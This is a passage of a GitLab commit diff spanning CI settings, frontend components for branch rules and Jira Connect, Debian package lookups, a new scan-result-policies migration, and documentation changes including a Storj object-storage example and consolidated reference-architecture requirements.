Add latest changes from gitlab-org/gitlab@master

This commit is contained in:
GitLab Bot 2023-01-31 15:10:47 +00:00
parent c62dd5ae44
commit 6f18a8d0b0
96 changed files with 966 additions and 973 deletions

View File

@ -42,7 +42,7 @@ review-docs-cleanup:
docs-lint links:
extends:
- .docs:rules:docs-lint
image: ${REGISTRY_HOST}/${REGISTRY_GROUP}/gitlab-docs/lint-html:alpine-3.16-ruby-2.7.7-8ae1f7da
image: ${REGISTRY_HOST}/${REGISTRY_GROUP}/gitlab-docs/lint-html:alpine-3.16-ruby-3.0.5-869cfc5d
stage: lint
needs: []
script:

View File

@ -19,7 +19,6 @@ include:
.base-before_script: &base-before_script
- source ./scripts/utils.sh
- source ./scripts/review_apps/review-apps.sh
- apt-get update && apt-get install -y jq
dont-interrupt-me:
extends: .rules:dont-interrupt

View File

@ -4289,7 +4289,6 @@ Layout/LineLength:
- 'spec/lib/gitlab/ci/status/build/manual_spec.rb'
- 'spec/lib/gitlab/ci/status/build/waiting_for_approval_spec.rb'
- 'spec/lib/gitlab/ci/status/stage/play_manual_spec.rb'
- 'spec/lib/gitlab/ci/templates/5_minute_production_app_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/Jobs/deploy_gitlab_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/auto_devops_gitlab_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/variables/builder_spec.rb'

View File

@ -136,7 +136,6 @@ Layout/SpaceInsideParens:
- 'spec/lib/gitlab/ci/pipeline/seed/build_spec.rb'
- 'spec/lib/gitlab/ci/reports/security/vulnerability_reports_comparer_spec.rb'
- 'spec/lib/gitlab/ci/reports/test_suite_spec.rb'
- 'spec/lib/gitlab/ci/templates/5_minute_production_app_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/AWS/deploy_ecs_gitlab_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/MATLAB_spec.rb'
- 'spec/lib/gitlab/ci/templates/Terraform/base_gitlab_ci_yaml_spec.rb'

View File

@ -1771,7 +1771,6 @@ RSpec/ContextWording:
- 'spec/lib/gitlab/ci/status/build/failed_spec.rb'
- 'spec/lib/gitlab/ci/status/composite_spec.rb'
- 'spec/lib/gitlab/ci/status/factory_spec.rb'
- 'spec/lib/gitlab/ci/templates/5_minute_production_app_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/Jobs/code_quality_gitlab_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/Jobs/sast_iac_gitlab_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/Jobs/sast_iac_latest_gitlab_ci_yaml_spec.rb'

View File

@ -4662,7 +4662,6 @@ RSpec/MissingFeatureCategory:
- 'spec/lib/gitlab/ci/status/success_warning_spec.rb'
- 'spec/lib/gitlab/ci/status/waiting_for_resource_spec.rb'
- 'spec/lib/gitlab/ci/tags/bulk_insert_spec.rb'
- 'spec/lib/gitlab/ci/templates/5_minute_production_app_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/AWS/deploy_ecs_gitlab_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/Jobs/build_gitlab_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/Jobs/deploy_gitlab_ci_yaml_spec.rb'

View File

@ -748,7 +748,6 @@ Style/PercentLiteralDelimiters:
- 'spec/lib/gitlab/ci/reports/test_suite_spec.rb'
- 'spec/lib/gitlab/ci/status/composite_spec.rb'
- 'spec/lib/gitlab/ci/status/stage/factory_spec.rb'
- 'spec/lib/gitlab/ci/templates/5_minute_production_app_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/Jobs/deploy_gitlab_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/Jobs/sast_iac_latest_gitlab_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/auto_devops_gitlab_ci_yaml_spec.rb'

View File

@ -1,10 +1,19 @@
import { setAttributes } from '~/lib/utils/dom_utils';
import axios from '~/lib/utils/axios_utils';
import { getBaseURL, relativePathToAbsolute, joinPaths } from '~/lib/utils/url_utility';
const SANDBOX_FRAME_PATH = '/-/sandbox/swagger';
const getSandboxFrameSrc = () => {
const path = joinPaths(gon.relative_url_root || '', SANDBOX_FRAME_PATH);
return relativePathToAbsolute(path, getBaseURL());
};
const createSandbox = () => {
const iframeEl = document.createElement('iframe');
setAttributes(iframeEl, {
src: '/-/sandbox/swagger',
src: getSandboxFrameSrc(),
sandbox: 'allow-scripts allow-popups allow-forms',
frameBorder: 0,
width: '100%',

View File

@ -31,6 +31,9 @@ export default {
subscriptionsPath: {
default: '',
},
publicKeyStorageEnabled: {
default: false,
},
},
computed: {
...mapState(['currentUser']),
@ -144,6 +147,7 @@ export default {
<sign-in-page
v-show="!userSignedIn"
:has-subscriptions="hasSubscriptions"
:public-key-storage-enabled="publicKeyStorageEnabled"
@sign-in-oauth="onSignInOauth"
@error="onSignInError"
/>

View File

@ -27,6 +27,7 @@ export function initJiraConnect() {
usersPath,
gitlabUserPath,
oauthMetadata,
publicKeyStorageEnabled,
} = el.dataset;
sizeToParent();
@ -42,6 +43,7 @@ export function initJiraConnect() {
usersPath,
gitlabUserPath,
oauthMetadata: oauthMetadata ? JSON.parse(oauthMetadata) : null,
publicKeyStorageEnabled,
},
render(createElement) {
return createElement(JiraConnectApp);

View File

@ -12,10 +12,14 @@ export default {
type: Boolean,
required: true,
},
publicKeyStorageEnabled: {
type: Boolean,
required: true,
},
},
computed: {
isOauthSelfManagedEnabled() {
return this.glFeatures.jiraConnectOauth;
return this.glFeatures.jiraConnectOauth && this.publicKeyStorageEnabled;
},
},
};

View File

@ -3,7 +3,7 @@ import { GlSprintf, GlLink, GlLoadingIcon } from '@gitlab/ui';
import { sprintf, n__ } from '~/locale';
import { getParameterByName, mergeUrlParams } from '~/lib/utils/url_utility';
import { helpPagePath } from '~/helpers/help_page_helper';
import branchRulesQuery from '../../queries/branch_rules_details.query.graphql';
import branchRulesQuery from 'ee_else_ce/projects/settings/branch_rules/queries/branch_rules_details.query.graphql';
import { getAccessLevels } from '../../../utils';
import Protection from './protection.vue';
import {
@ -12,22 +12,16 @@ import {
BRANCH_PARAM_NAME,
WILDCARDS_HELP_PATH,
PROTECTED_BRANCHES_HELP_PATH,
APPROVALS_HELP_PATH,
STATUS_CHECKS_HELP_PATH,
} from './constants';
const wildcardsHelpDocLink = helpPagePath(WILDCARDS_HELP_PATH);
const protectedBranchesHelpDocLink = helpPagePath(PROTECTED_BRANCHES_HELP_PATH);
const approvalsHelpDocLink = helpPagePath(APPROVALS_HELP_PATH);
const statusChecksHelpDocLink = helpPagePath(STATUS_CHECKS_HELP_PATH);
export default {
name: 'RuleView',
i18n: I18N,
wildcardsHelpDocLink,
protectedBranchesHelpDocLink,
approvalsHelpDocLink,
statusChecksHelpDocLink,
components: { Protection, GlSprintf, GlLink, GlLoadingIcon },
inject: {
projectPath: {
@ -36,12 +30,6 @@ export default {
protectedBranchesPath: {
default: '',
},
approvalRulesPath: {
default: '',
},
statusChecksPath: {
default: '',
},
branchesPath: {
default: '',
},
@ -58,7 +46,7 @@ export default {
const branchRule = branchRules.nodes.find((rule) => rule.name === this.branch);
this.branchRule = branchRule;
this.branchProtection = branchRule?.branchProtection;
this.approvalRules = branchRule?.approvalRules;
this.approvalRules = branchRule?.approvalRules?.nodes || [];
this.statusChecks = branchRule?.externalStatusChecks?.nodes || [];
this.matchingBranchesCount = branchRule?.matchingBranchesCount;
},
@ -98,20 +86,6 @@ export default {
total: this.pushAccessLevels?.total || 0,
});
},
approvalsHeader() {
const total = this.approvals.reduce(
(sum, { approvalsRequired }) => sum + approvalsRequired,
0,
);
return sprintf(this.$options.i18n.approvalsHeader, {
total,
});
},
statusChecksHeader() {
return sprintf(this.$options.i18n.statusChecksHeader, {
total: this.statusChecks.length,
});
},
allBranches() {
return this.branch === ALL_BRANCHES_WILDCARD;
},
@ -131,8 +105,13 @@ export default {
const subject = n__('branch', 'branches', total);
return sprintf(this.$options.i18n.matchingBranchesLinkTitle, { total, subject });
},
approvals() {
return this.approvalRules?.nodes || [];
// needed to override EE component
statusChecksHeader() {
return '';
},
// needed to override EE component
approvalsHeader() {
return '';
},
},
methods: {
@ -199,40 +178,46 @@ export default {
:groups="mergeAccessLevels.groups"
/>
<!-- EE start -->
<!-- Approvals -->
<h4 class="gl-mb-1 gl-mt-5">{{ $options.i18n.approvalsTitle }}</h4>
<gl-sprintf :message="$options.i18n.approvalsDescription">
<template #link="{ content }">
<gl-link :href="$options.approvalsHelpDocLink">
{{ content }}
</gl-link>
</template>
</gl-sprintf>
<template v-if="approvalsHeader">
<h4 class="gl-mb-1 gl-mt-5">{{ $options.i18n.approvalsTitle }}</h4>
<gl-sprintf :message="$options.i18n.approvalsDescription">
<template #link="{ content }">
<gl-link :href="$options.approvalsHelpDocLink">
{{ content }}
</gl-link>
</template>
</gl-sprintf>
<protection
class="gl-mt-3"
:header="approvalsHeader"
:header-link-title="$options.i18n.manageApprovalsLinkTitle"
:header-link-href="approvalRulesPath"
:approvals="approvals"
/>
<protection
class="gl-mt-3"
:header="approvalsHeader"
:header-link-title="$options.i18n.manageApprovalsLinkTitle"
:header-link-href="approvalRulesPath"
:approvals="approvalRules"
/>
</template>
<!-- Status checks -->
<h4 class="gl-mb-1 gl-mt-5">{{ $options.i18n.statusChecksTitle }}</h4>
<gl-sprintf :message="$options.i18n.statusChecksDescription">
<template #link="{ content }">
<gl-link :href="$options.statusChecksHelpDocLink">
{{ content }}
</gl-link>
</template>
</gl-sprintf>
<template v-if="statusChecksHeader">
<h4 class="gl-mb-1 gl-mt-5">{{ $options.i18n.statusChecksTitle }}</h4>
<gl-sprintf :message="$options.i18n.statusChecksDescription">
<template #link="{ content }">
<gl-link :href="$options.statusChecksHelpDocLink">
{{ content }}
</gl-link>
</template>
</gl-sprintf>
<protection
class="gl-mt-3"
:header="statusChecksHeader"
:header-link-title="$options.i18n.statusChecksLinkTitle"
:header-link-href="statusChecksPath"
:status-checks="statusChecks"
/>
<protection
class="gl-mt-3"
:header="statusChecksHeader"
:header-link-title="$options.i18n.statusChecksLinkTitle"
:header-link-href="statusChecksPath"
:status-checks="statusChecks"
/>
</template>
<!-- EE end -->
</div>
</template>

View File

@ -1,7 +1,7 @@
import Vue from 'vue';
import VueApollo from 'vue-apollo';
import createDefaultClient from '~/lib/graphql';
import View from './components/view/index.vue';
import View from 'ee_else_ce/projects/settings/branch_rules/components/view/index.vue';
export default function mountBranchRules(el) {
if (!el) {

View File

@ -4,24 +4,14 @@ query getBranchRulesDetails($projectPath: ID!) {
branchRules {
nodes {
name
matchingBranchesCount
branchProtection {
allowForcePush
codeOwnerApprovalRequired
mergeAccessLevels {
edges {
node {
accessLevel
accessLevelDescription
group {
id
avatarUrl
}
user {
id
name
avatarUrl
webUrl
}
}
}
}
@ -30,45 +20,10 @@ query getBranchRulesDetails($projectPath: ID!) {
node {
accessLevel
accessLevelDescription
group {
id
avatarUrl
}
user {
id
name
avatarUrl
webUrl
}
}
}
}
}
approvalRules {
nodes {
id
name
type
approvalsRequired
eligibleApprovers {
nodes {
id
name
username
webUrl
avatarUrl
}
}
}
}
externalStatusChecks {
nodes {
id
name
externalUrl
}
}
matchingBranchesCount
}
}
}

View File

@ -106,7 +106,7 @@ export default {
},
approvalDetails() {
const approvalDetails = [];
if (this.isWildcard) {
if (this.isWildcard || this.matchingBranchesCount > 1) {
approvalDetails.push(this.matchingBranchesText);
}
if (this.branchProtection?.allowForcePush) {

View File

@ -9,7 +9,7 @@ export const getAccessLevels = (accessLevels = {}) => {
} else if (node.group) {
accessLevelTypes.groups.push(node);
} else {
accessLevelTypes.roles.push(node);
accessLevelTypes.roles.push({ accessLevelDescription: node.accessLevelDescription });
}
});

View File

@ -31,6 +31,7 @@ class Projects::CommitController < Projects::ApplicationController
respond_to do |format|
format.html do
@ref = params[:id]
render locals: { pagination_params: params.permit(:page) }
end
format.diff do

View File

@ -46,7 +46,12 @@ module Resolvers
def nested_preloads
{
widgets: widget_preloads,
user_permissions: { update_work_item: :assignees }
user_permissions: { update_work_item: :assignees },
project: { jira_import_status: { project: :jira_imports } },
author: {
location: { author: :user_detail },
gitpod_enabled: { author: :user_preference }
}
}
end
@ -57,7 +62,7 @@ module Resolvers
parent: :work_item_parent,
children: { work_item_children_by_created_at: [:author, { project: :project_feature }] },
labels: :labels,
milestone: :milestone
milestone: { milestone: [:project, :group] }
}
end

View File

@ -8,6 +8,9 @@ module Types
authorize :read_work_item
field :author, Types::UserType, null: true,
description: 'User that created the work item.',
alpha: { milestone: '15.9' }
field :closed_at, Types::TimeType, null: true,
description: 'Timestamp of when the work item was closed.'
field :confidential, GraphQL::Types::Boolean, null: false,

View File

@ -11,7 +11,8 @@ module JiraConnectHelper
subscriptions_path: jira_connect_subscriptions_path(format: :json),
users_path: current_user ? nil : jira_connect_users_path, # users_path is used to determine if user is signed in
gitlab_user_path: current_user ? user_path(current_user) : nil,
oauth_metadata: Feature.enabled?(:jira_connect_oauth, current_user) ? jira_connect_oauth_data(installation).to_json : nil
oauth_metadata: Feature.enabled?(:jira_connect_oauth, current_user) ? jira_connect_oauth_data(installation).to_json : nil,
public_key_storage_enabled: Gitlab.config.jira_connect.enable_public_keys_storage
}
end

View File

@ -10,6 +10,7 @@ class Packages::Debian::GroupDistribution < ApplicationRecord
def packages
Packages::Package
.for_projects(group.all_projects.public_only)
.debian
.with_debian_codename(codename)
end
end

View File

@ -138,10 +138,12 @@ class Packages::Package < ApplicationRecord
joins(:conan_metadatum).where(packages_conan_metadata: { package_username: package_username })
end
scope :with_debian_codename, -> (codename) do
debian
.joins(:debian_distribution)
.where(Packages::Debian::ProjectDistribution.table_name => { codename: codename })
scope :with_debian_codename, ->(codename) do
joins(:debian_distribution).where(Packages::Debian::ProjectDistribution.table_name => { codename: codename })
end
scope :with_debian_codename_or_suite, ->(codename_or_suite) do
joins(:debian_distribution).where(Packages::Debian::ProjectDistribution.table_name => { codename: codename_or_suite })
.or(where(Packages::Debian::ProjectDistribution.table_name => { suite: codename_or_suite }))
end
scope :preload_debian_file_metadata, -> { preload(package_files: :debian_file_metadatum) }
scope :with_composer_target, -> (target) do

View File

@ -10,7 +10,7 @@ module Packages
.debian
.with_name(params[:name])
.with_version(params[:version])
.with_debian_codename(params[:distribution_name])
.with_debian_codename_or_suite(params[:distribution_name])
.not_pending_destruction
.first
@ -26,7 +26,10 @@ module Packages
def distribution
strong_memoize(:distribution) do
Packages::Debian::DistributionsFinder.new(project, codename: params[:distribution_name]).execute.last!
Packages::Debian::DistributionsFinder.new(
project,
codename_or_suite: params[:distribution_name]
).execute.last!
end
end
end

View File

@ -15,12 +15,12 @@ module Packages
end
def execute
# return if changes file has already been processed
return if package_file.debian_file_metadatum&.changes?
validate!
try_obtain_lease do
# return if changes file has already been processed
break if package_file.debian_file_metadatum&.changes?
validate!
package_file.transaction do
update_files_metadata
update_changes_metadata
@ -38,6 +38,9 @@ module Packages
raise ArgumentError, 'invalid package file' unless package_file.debian_file_metadatum
raise ArgumentError, 'invalid package file' unless package_file.debian_file_metadatum.unknown?
raise ArgumentError, 'invalid package file' unless metadata[:file_type] == :changes
raise ArgumentError, 'missing Source field' unless metadata.dig(:fields, 'Source').present?
raise ArgumentError, 'missing Version field' unless metadata.dig(:fields, 'Version').present?
raise ArgumentError, 'missing Distribution field' unless metadata.dig(:fields, 'Distribution').present?
end
def update_files_metadata

View File

@ -19,9 +19,9 @@ module Packages
def execute
return if @package_file.package.pending_destruction?
try_obtain_lease do
validate!
validate!
try_obtain_lease do
package.transaction do
rename_package_and_set_version
update_package
@ -36,6 +36,8 @@ module Packages
private
def validate!
raise ArgumentError, 'missing distribution name' unless @distribution_name.present?
raise ArgumentError, 'missing component name' unless @component_name.present?
raise ArgumentError, 'package file without Debian metadata' unless @package_file.debian_file_metadatum
raise ArgumentError, 'already processed package file' unless @package_file.debian_file_metadatum.unknown?
@ -55,7 +57,7 @@ module Packages
.debian
.with_name(package_name)
.with_version(package_version)
.with_debian_codename(@distribution_name)
.with_debian_codename_or_suite(@distribution_name)
.not_pending_destruction
.last
package || temp_package
@ -113,7 +115,7 @@ module Packages
def distribution
Packages::Debian::DistributionsFinder.new(
@package_file.package.project,
codename: @distribution_name
codename_or_suite: @distribution_name
).execute.last!
end
strong_memoize_attr :distribution

View File

@ -0,0 +1,9 @@
---
table_name: scan_result_policies
classes: []
feature_categories:
- security_policy_management
description: 'Stores rules of a Security Orchestration Policy.'
introduced_by_url: https://gitlab.com/gitlab-org/gitlab/-/merge_requests/109624
milestone: '15.9'
gitlab_schema: gitlab_main

View File

@ -0,0 +1,18 @@
# frozen_string_literal: true
class CreateScanResultPolicies < Gitlab::Database::Migration[2.1]
INDEX_NAME = "index_scan_result_policies_on_policy_configuration_id".freeze
def change
create_table :scan_result_policies do |t|
t.references :security_orchestration_policy_configuration,
null: false,
foreign_key: { on_delete: :cascade },
index: { name: INDEX_NAME }
t.timestamps_with_timezone null: false
t.integer :orchestration_policy_idx, limit: 2, null: false
t.text :license_states, array: true, default: []
end
end
end

View File

@ -0,0 +1,15 @@
# frozen_string_literal: true
class AddScanResultPolicyIdToSoftwareLicensePolicies < Gitlab::Database::Migration[2.1]
INDEX_NAME = "index_software_license_policies_on_scan_result_policy_id".freeze
def change
# rubocop:disable Migration/AddReference
add_reference :software_license_policies,
:scan_result_policy,
foreign_key: { on_delete: :cascade },
index: { name: INDEX_NAME },
null: true
# rubocop:enable Migration/AddReference
end
end

View File

@ -0,0 +1 @@
d526d2549357ca87fb4abf400d6128cc14d01ea633cf2d496c3a9111e412c7f2

View File

@ -0,0 +1 @@
7ad649155804a011c43e4208eea1f59c3e6894591587b5cf9ba4e8be4f5fa757

View File

@ -21580,6 +21580,24 @@ CREATE SEQUENCE sbom_vulnerable_component_versions_id_seq
ALTER SEQUENCE sbom_vulnerable_component_versions_id_seq OWNED BY sbom_vulnerable_component_versions.id;
CREATE TABLE scan_result_policies (
id bigint NOT NULL,
security_orchestration_policy_configuration_id bigint NOT NULL,
created_at timestamp with time zone NOT NULL,
updated_at timestamp with time zone NOT NULL,
orchestration_policy_idx smallint NOT NULL,
license_states text[] DEFAULT '{}'::text[]
);
CREATE SEQUENCE scan_result_policies_id_seq
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER SEQUENCE scan_result_policies_id_seq OWNED BY scan_result_policies.id;
CREATE TABLE schema_migrations (
version character varying NOT NULL,
finished_at timestamp with time zone DEFAULT now()
@ -22011,7 +22029,8 @@ CREATE TABLE software_license_policies (
software_license_id integer NOT NULL,
classification integer DEFAULT 0 NOT NULL,
created_at timestamp with time zone NOT NULL,
updated_at timestamp with time zone NOT NULL
updated_at timestamp with time zone NOT NULL,
scan_result_policy_id bigint
);
CREATE SEQUENCE software_license_policies_id_seq
@ -24796,6 +24815,8 @@ ALTER TABLE ONLY sbom_sources ALTER COLUMN id SET DEFAULT nextval('sbom_sources_
ALTER TABLE ONLY sbom_vulnerable_component_versions ALTER COLUMN id SET DEFAULT nextval('sbom_vulnerable_component_versions_id_seq'::regclass);
ALTER TABLE ONLY scan_result_policies ALTER COLUMN id SET DEFAULT nextval('scan_result_policies_id_seq'::regclass);
ALTER TABLE ONLY scim_identities ALTER COLUMN id SET DEFAULT nextval('scim_identities_id_seq'::regclass);
ALTER TABLE ONLY scim_oauth_access_tokens ALTER COLUMN id SET DEFAULT nextval('scim_oauth_access_tokens_id_seq'::regclass);
@ -27128,6 +27149,9 @@ ALTER TABLE ONLY sbom_sources
ALTER TABLE ONLY sbom_vulnerable_component_versions
ADD CONSTRAINT sbom_vulnerable_component_versions_pkey PRIMARY KEY (id);
ALTER TABLE ONLY scan_result_policies
ADD CONSTRAINT scan_result_policies_pkey PRIMARY KEY (id);
ALTER TABLE ONLY schema_migrations
ADD CONSTRAINT schema_migrations_pkey PRIMARY KEY (version);
@ -31271,6 +31295,8 @@ CREATE UNIQUE INDEX index_sbom_occurrences_on_uuid ON sbom_occurrences USING btr
CREATE UNIQUE INDEX index_sbom_sources_on_source_type_and_source ON sbom_sources USING btree (source_type, source);
CREATE INDEX index_scan_result_policies_on_policy_configuration_id ON scan_result_policies USING btree (security_orchestration_policy_configuration_id);
CREATE INDEX index_scim_identities_on_group_id ON scim_identities USING btree (group_id);
CREATE UNIQUE INDEX index_scim_identities_on_lower_extern_uid_and_group_id ON scim_identities USING btree (lower((extern_uid)::text), group_id);
@ -31381,6 +31407,8 @@ CREATE INDEX index_snippets_on_updated_at ON snippets USING btree (updated_at);
CREATE INDEX index_snippets_on_visibility_level_and_secret ON snippets USING btree (visibility_level, secret);
CREATE INDEX index_software_license_policies_on_scan_result_policy_id ON software_license_policies USING btree (scan_result_policy_id);
CREATE INDEX index_software_license_policies_on_software_license_id ON software_license_policies USING btree (software_license_id);
CREATE UNIQUE INDEX index_software_license_policies_unique_per_project ON software_license_policies USING btree (project_id, software_license_id);
@ -35844,6 +35872,9 @@ ALTER TABLE ONLY incident_management_timeline_event_tags
ALTER TABLE ONLY user_callouts
ADD CONSTRAINT fk_rails_ddfdd80f3d FOREIGN KEY (user_id) REFERENCES users(id) ON DELETE CASCADE;
ALTER TABLE ONLY scan_result_policies
ADD CONSTRAINT fk_rails_de9e5d2ce6 FOREIGN KEY (security_orchestration_policy_configuration_id) REFERENCES security_orchestration_policy_configurations(id) ON DELETE CASCADE;
ALTER TABLE ONLY dast_scanner_profiles_tags
ADD CONSTRAINT fk_rails_deb79b7f19 FOREIGN KEY (dast_scanner_profile_id) REFERENCES dast_scanner_profiles(id) ON DELETE CASCADE;
@ -35895,6 +35926,9 @@ ALTER TABLE ONLY serverless_domain_cluster
ALTER TABLE ONLY incident_management_escalation_policies
ADD CONSTRAINT fk_rails_e5b513daa7 FOREIGN KEY (project_id) REFERENCES projects(id) ON DELETE CASCADE;
ALTER TABLE ONLY software_license_policies
ADD CONSTRAINT fk_rails_e5b77d620e FOREIGN KEY (scan_result_policy_id) REFERENCES scan_result_policies(id) ON DELETE CASCADE;
ALTER TABLE ONLY vulnerability_external_issue_links
ADD CONSTRAINT fk_rails_e5ba7f7b13 FOREIGN KEY (author_id) REFERENCES users(id) ON DELETE SET NULL;

View File

@ -586,6 +586,30 @@ If you are using a custom Azure storage domain,
configuration. This information is exchanged in an API call between
GitLab Rails and Workhorse.
#### Storj Gateway Configuration (SJ)
NOTE:
The Storj Gateway [does not support](https://github.com/storj/gateway-st/blob/4b74c3b92c63b5de7409378b0d1ebd029db9337d/docs/s3-compatibility.md) multi-threaded copying (see `UploadPartCopy` in the table).
While an implementation [is planned](https://github.com/storj/roadmap/issues/40), you must [disable multi-threaded copying](#multi-threaded-copying) until completion.
The [Storj Network](https://www.storj.io/) provides an S3-compatible API gateway. Use the following configuration example:
```ruby
gitlab_rails['object_store']['connection'] = {
'provider' => 'AWS',
'endpoint' => 'https://gateway.storjshare.io',
'path_style' => true,
'region' => 'eu1',
'aws_access_key_id' => 'ACCESS_KEY',
'aws_secret_access_key' => 'SECRET_KEY',
'aws_signature_version' => 2,
'enable_signature_v4_streaming' => false
}
```
The signature version must be `2`. Using v4 results in a HTTP 411 Length Required error.
For more information, see [issue #4419](https://gitlab.com/gitlab-org/gitlab/-/issues/4419).
### Object-specific configuration
The following YAML shows how the `object_store` section defines

View File

@ -50,7 +50,9 @@ full list of reference architectures, see
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:
@ -144,66 +146,7 @@ monitor .[#7FFFD4,norank]u--> elb
## Requirements
Before starting, you should take note of the following requirements / guidance for this reference architecture.
### Supported CPUs
This reference architecture was built and tested on Google Cloud Platform (GCP) using the
[Intel Xeon E5 v3 (Haswell)](https://cloud.google.com/compute/docs/cpu-platforms)
CPU platform as a baseline ([Sysbench benchmark](https://gitlab.com/gitlab-org/quality/performance/-/wikis/Reference-Architectures/GCP-CPU-Benchmarks)).
Newer, similarly sized CPUs are supported and may have improved performance as a result. For Omnibus environments, ARM-based equivalents are also supported.
NOTE:
Any "burstable" instance types are not recommended due to inconsistent performance.
### Supported infrastructure
As a general guidance, GitLab should run on most infrastructure such as reputable Cloud Providers (AWS, GCP) and their services,
or self managed (ESXi) that meet both the specs detailed above, as well as any requirements in this section.
However, this does not constitute a guarantee for every potential permutation.
See [Recommended cloud providers and services](index.md#recommended-cloud-providers-and-services) for more information.
### Additional workloads
The Reference Architectures have been [designed and tested](index.md#validation-and-test-results) for standard GitLab setups with
good headroom in mind to cover most scenarios. However, if any additional workloads are being added on the nodes,
such as security software, you may still need to adjust the specs accordingly to compensate.
This also applies for some GitLab features where it's possible to run custom scripts, for example [server hooks](../server_hooks.md).
As a general rule, it's recommended to have robust monitoring in place to measure the impact of
any additional workloads to inform any changes needed to be made.
### Large repositories
The Reference Architectures were tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos (several gigabytes or more) can **significantly** impact the performance
of Git and in turn the environment itself if best practices aren't being followed such as not storing
binary or blob files in LFS. Repositories are at the core of any environment the consequences can be wide-ranging
when they are not optimized. Some examples of this impact include [Git packing operations](https://git-scm.com/book/en/v2/Git-Internals-Packfiles)
taking longer and consuming high CPU / Memory resources or Git checkouts taking longer that affect both users and
CI pipelines alike.
As such, large repositories come with notable cost and typically will require more resources to handle,
significantly so in some cases. It's therefore **strongly** recommended then to review large repositories
to ensure they maintain good health and reduce their size wherever possible.
NOTE:
If best practices aren't followed and large repositories are present on the environment,
increased Gitaly specs may be required to ensure stable performance.
Refer to the [Managing large repositories documentation](../../user/project/repository/managing_large_repositories.md)
for more information and guidance.
### Praefect PostgreSQL
It's worth noting that at this time [Praefect requires its own database server](../gitaly/praefect.md#postgresql) and
that to achieve full High Availability a third-party PostgreSQL database solution will be required.
We hope to offer a built in solutions for these restrictions in the future but in the meantime a non HA PostgreSQL server
can be set up via Omnibus GitLab, which the above specs reflect. Refer to the following issues for more information: [`omnibus-gitlab#5919`](https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/5919) & [`gitaly#3398`](https://gitlab.com/gitlab-org/gitaly/-/issues/3398).
Before starting, see the [requirements](index.md#requirements) for reference architectures.
## Setup components
@ -1223,7 +1166,7 @@ NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
The recommended cluster setup includes the following components:
@ -1533,14 +1476,14 @@ requirements that are dependent on data and load.
NOTE:
Increased specs for Gitaly nodes may be required in some circumstances such as
significantly large repositories or if any [additional workloads](#additional-workloads),
significantly large repositories or if any [additional workloads](index.md#additional-workloads),
such as [server hooks](../server_hooks.md), have been added.
NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [large repositories](index.md#large-repositories) for more information.
Due to Gitaly having notable input and output requirements, we strongly
recommend that all Gitaly nodes use solid-state drives (SSDs). These SSDs
@ -2346,7 +2289,9 @@ services where applicable):
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:

View File

@ -67,47 +67,7 @@ The diagram above shows that while GitLab can be installed on a single server, i
## Requirements
Before starting, you should take note of the following requirements / guidance for this reference architecture.
### Supported CPUs
This reference architecture was built and tested on Google Cloud Platform (GCP) using the
[Intel Xeon E5 v3 (Haswell)](https://cloud.google.com/compute/docs/cpu-platforms)
CPU platform as a baseline ([Sysbench benchmark](https://gitlab.com/gitlab-org/quality/performance/-/wikis/Reference-Architectures/GCP-CPU-Benchmarks)).
Newer, similarly sized CPUs are supported and may have improved performance as a result. For Omnibus environments, ARM-based equivalents are also supported.
NOTE:
Any "burstable" instance types are not recommended due to inconsistent performance.
### Supported infrastructure
